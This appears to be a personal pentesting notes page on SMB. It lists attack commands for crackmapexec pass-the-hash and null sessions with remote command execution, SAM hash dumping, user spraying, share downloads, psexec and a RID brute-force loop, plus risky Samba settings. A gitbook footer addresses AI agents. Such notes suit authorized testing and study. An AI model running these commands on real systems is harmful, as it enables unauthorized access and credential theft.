# SMB ## About **Server Message Block (SMB)** is a client-server **protocol** that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network. The **SMB** protocol enables the client to communicate with other participants in the same network to access files or services shared with it on the network. By default is **using ports 137, 138, 139, and 445** ## TOOLS There are a lot different tools for SMB interacton: ### CrackMapExec **Null-session** login, or **Pass-The-Hash** Attack ```bash crackmapexec smb 13.13.13.13 -u Administrator -d . -H 12379N1D2YV31U20931C031 -x whoami OR crackmapexec smb {DOMAIN} -u '' -p '' --shares OR crackmapexec smb {DOMAIN} -u 'blibbityblabbity' -p '' --shares ``` Check if there are **users from list** available ```bash crackmapexec smb {DOMAIN} -u users.txt -p '' -d . --continue-on-success # Or we could do user=password type of attack with using: crackmapexec smb {DOMAIN} -u users.txt -d . --no-bruteforce --continue-on-success ``` | Command | Explanation | | ------------------------------------------------------------- | ----------------------------------------- | | **`--shares`** | Look for SMB shares | | **`--continue-on-success`** | Continue after finding right creds | | **`--no-bruteforce`** | just using worlist without any variations | | **`--rid-brute`** | Bruteforce RID | | **`--local-auth`** | Local auth, without domain creds | | **`-M`** | Use module | | **`--sam`** | Extract SAM hashes | | **`--exec-method`** | Method used for executing commands | | **`--loggedon-users`** | Enumerate logged in users | | `-M spider_plus` | Spider module | | `-x 'type C:\root.txt'` | Execute command | ### Samba **Samba** is an alternative variant to the **SMB** server, developed for Unix-based operating system. Samba implements the **Common Internet File System (CIFS)** network protocol. **CIFS** is a "dialect" of **SMB**. In other words, **CIFS** is a very specific implementation of the **SMB** protocol, which in turn was created by Microsoft. Therefore, it usually is referred to as **SMB / CIFS**. However, **CIFS** is the extension of the **SMB** protocol. * Samba server over TCP ports **137**, **138**, **139**, but CIFS uses TCP port **445** only. In a network,using Samba, each host participates in the same **workgroup**. A workgroup is a group name that identifies an arbitrary collection of computers and their resources on an SMB network. * **`smbstatus`** command to see who, from which host, and which share the client is connected. * Config location: ```bash cat /etc/samba/smb.conf | grep -v "#\|\;" ``` ### Smbclient #### Recursively download all files ``` smbclient //13.13.13.13/share -N -c 'prompt OFF; recurse ON; mget *' ``` #### **Connecting to the Share with ****`smbclient`** ```bash smbclient -N -L //13.13.13.13 ``` **OR** ```bash smbclient -U username \\\\13.13.13.13\\share ``` > **`-N`** is for **null session**, which is anonymous access without the input user/pass. And **`-L`** is to list all shares. > For basic interaction with share, you would need only these commands: * **`help`** to have list of available commands * **`ls`** list * **`get`** download * **`!command`** user prefix ! before command to execute it locally ### SMBMap #### Regular SMB enum ```bash smbmap -H 13.13.13.13 ``` #### Recursive SMB enum ```bash smbmap -H 13.13.13.13 -r share ``` #### Download to SMB server: ```bash smbmap -H 13.13.13.13 --download "share\example.txt" ``` #### Upload to SMB server ```bash smbmap -H 13.13.13.13 --upload example.txt "share\example.txt" ``` ### Impacket-smbclient ```bash impacket-smbclient 'sreed@domain.local' -no-pass sudo impacket-smbserver share ./ -smb2support # Creation of SMB Server ``` ### Impacket-psexec ```bash impacket-psexec administrator:'amoguskek'@13.13.13.13 # Same goes for impacket-smbexec and impacket-atexec ``` ### RPCclient **Remote Procedure Call (RPC)** is a **concept** and, therefore, also a central **tool** to realize operational and work-sharing structures in networks and client-server architectures. Other words, **RPC** is a mechanism for interaction between processes that are executed on different nodes in the network**.** The communication process via **RPC** includes passing parameters and the return of a function value. Also **RPC** have **Remote Invocation Descriptor** or **RID**,which is a unique **identifier** assigned to each remote procedure call. It is used to keep track of and manage the execution of remote procedures. Also there is a nice **cheatsheet** from SANS Institute [**\[LINK\]**](https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf) #### Connect to SMB server ```bash rpcclient -U "" 13.13.13.13 rpcclient $> {function} ``` With connected **RPC** client we could use many different functions as: | Function | Description | | --------------------------------------------------------------- | ----------------------------------------------------------------- | | **`srvinfo`** | Server information | | **`enumdomains`** | Enumerate all domains that are deployed in the network | | **`querydominfo`** | Provides domain, server, and user information of deployed domains | | **`netshareenumall`** | Enumerates all available shares | | **`netsharegetinfo `** | Provides information about a specific share | | **`enumdomusers`** | Enumerates all domain users | | **`queryuser `** | Provides information about a specific user | | **`querygroup `** | Provides information about a specific group | ### WINDOWS NET ```powershell net use \\DC01\ipc$ "" /u:"" ``` ## Dangerous Settings * **`browseable = yes`** - Allow listing available shares in the current share? * **`read only = no`** - Forbid the creation and modification of files? * **`writable = yes`** - Allow users to create and modify files? * **`guest ok = yes`** - Allow connecting to the service without using a password? * **`enable privileges = yes`** - Honor privileges assigned to specific SID? * **`create mask = 0777`** - What permissions must be assigned to the newly created files? * **`directory mask = 0777`** - What permissions must be assigned to the newly created directories? * **`logon script = script.sh`** - What script needs to be executed on the user's login? * **`magic script = script.sh`** - Which script should be executed when the script gets closed? * **`magic output = script.out`** - Where the output of the magic script needs to be stored? ## Making a Share > As example we will be using Windows 10. > > For a beginning we need to make a folder. > > Then we are going to use the **Advanced Sharing** option to configure share.

> Keep in mind that with shared resources, both the SMB and NTFS permissions lists apply to every resource that gets shared in Windows.

> Here we could do more precise NTFS permissions control. If the mark is grey, then permissions are inherited from parent directory.

## Mount a Share ```bash sudo mount -t cifs -o username=venator17,password=ababagalabaga //13.13.13.13/"Sharename" /home/user/Desktop/ ``` ## Tips2Hack 1. To bruteforce RID using rpcclient to do active enum of users and groups you could use this command: ```bash for i in $(seq 500 1100);do rpcclient -N -U "" 13.13.13.13 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done ``` 3. Or for the same cause you could try yo use [**samrdump.py**](https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py) script 4. You could use [**enum4linux-ng**](https://github.com/cddmp/enum4linux-ng) or **`enum4linux`** ```bash ./enum4linux-ng.py 13.13.13.13 -A ``` 5. Also you could monitor shares from **Computer Management** tool, or view Share access logs in **Event Viewer** --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://venator17.gitbook.io/bibliotheque/pentesting/protocols/smb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.